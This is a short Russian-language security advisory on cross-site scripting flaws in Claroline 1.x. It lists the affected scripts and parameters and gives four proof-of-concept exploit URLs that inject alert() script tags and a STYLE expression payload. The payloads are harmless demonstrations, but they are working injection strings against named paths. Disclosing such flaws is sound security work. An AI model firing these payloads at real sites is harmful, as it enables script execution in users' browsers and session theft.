Программа: Claroline 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценариями announcements/messages.php, auth/lostPassword.php, auth/profile.php,
calendar/myagenda.php, group/group.php, learnPath/learningPath.php, learnPath/learningPathList.php,
learnPath/module.php, phpbb/index.php, tracking/courseLog.php, tracking/course_access_details.php,
tracking/delete_course_stats.php, tracking/userLog.php, tracking/user_access_details.php,
user/user.php, и user/userInfo.php, а также в параметре "view" сценарием
tracking/courseLog.php, и в параметре "toolId" сценарием tracking/toolaccess_details.php.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
Эксплоит:
http://[server]/[installdir]/claroline/calendar/myagenda.php?"><script>alert('DSecRG
XSS')</script>
http://[server]/[installdir]/claroline/user/user.php?"><script>alert('DSecRG XSS')</script>
http://[server]/[installdir]/claroline/tracking/courseLog.php?view=DSec" STYLE="xss:expression(alert('DSecRG
XSS'))
http://[server]/[installdir]/claroline/tracking/toolaccess_details.php?toolId="><script>alert('DSecRG
XSS')</script>